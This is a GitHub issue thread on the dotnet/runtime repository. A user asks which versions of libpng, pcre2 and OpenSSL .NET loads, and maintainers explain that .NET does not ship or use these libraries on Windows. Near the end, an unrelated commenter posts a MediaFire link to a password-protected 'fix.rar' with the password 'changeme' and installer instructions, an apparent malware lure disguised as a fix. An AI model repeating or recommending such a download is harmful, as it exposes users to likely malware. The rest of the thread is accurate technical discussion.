### ISSUE TITLE
Versions of third-party-libraries (libpng16.dll , pcre2-8-0.dll &  openssl.dll) used by dotnet runtime.

### ISSUE THREAD

**Issue by ravalikakurumillla** [dotnet/runtime#107001]
We are using `.NET SDK 8.0.204` in our application development. Due to security compliance, we want to make sure that all the third party library's used by our application has a valid version. The `System` libraries mentioned below are loading certain third-party-libraries but we cannot fetch the versions of these 3 third party libraries loaded by .net runtime. Do we have any where the list of the versions documentation for public users like a license document?
 
 `System.Drawing -> libpng16.dll `
 `System.Text.RegularExpression ->  pcre2-8-0.dll`
 `System.Security.Cryptography.OpenSsl -> openssl.dll`

**Comment by teo-tsirpanis** [comment]
Why do you believe that .NET is loading these libraries (on Windows I presume judging from the `dll` extension)? It's highly likely that another component of your application is loading them.

OpenSSL is not being used on Windows, and on other platforms it uses whatever version is already installed in your system.

[`pcre2`](https://github.com/search?q=repo%3Adotnet%2Fruntime%20pcre2&type=code) and [`libpng`](https://github.com/search?q=repo%3Adotnet%2Fruntime+libpng&type=code) are not being used by .NET at all, in either test or shipping code as demonstrated by the linked code searches.

**Comment by ravalikakurumillla** [comment]
Application is loading `System.Security.Cryptography.OpenSsl.dll` (Isn't dotnet runtime loading these System libraries? If it loads what is the version of opensll this dll is using?) We do not use these libraries anywhere else in the application.

**Comment by teo-tsirpanis** [comment]
`System.Security.Cryptography.OpenSsl.dll` contains some APIs to allow interoperability with OpenSSL. On platforms where OpenSSL is not supported like Windows, these APIs always throw `PlatformNotSupportedException`. On platforms where OpenSSL is supported these APIs use the OpenSSL version already installed in your system. .NET does not provide OpenSSL binaries and we cannot know the OpenSSL version of your system.

What is your operating system and its version by the way?

**Comment by jkotas** [comment]
> System.Security.Cryptography.OpenSsl.dll contains some APIs to allow interoperability with OpenSSL

System.Security.Cryptography.OpenSsl is not really a thing anymore. See https://github.com/dotnet/runtime/tree/main/src/libraries/System.Security.Cryptography.OpenSsl .

**Comment by ravalikakurumillla** [comment]
Windows 10 Enterprise 64-bit operating system.

Okay, So that means `System.Security.Cryptography.OpenSsl.dll` does not load any OpenSSL on windows and no longer contains any code.

**Comment by teo-tsirpanis** [comment]
Yes. If you are on Windows .NET will not use OpenSSL.

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by teo-tsirpanis** [comment]
Closing as answered. Let us know if you have further questions.
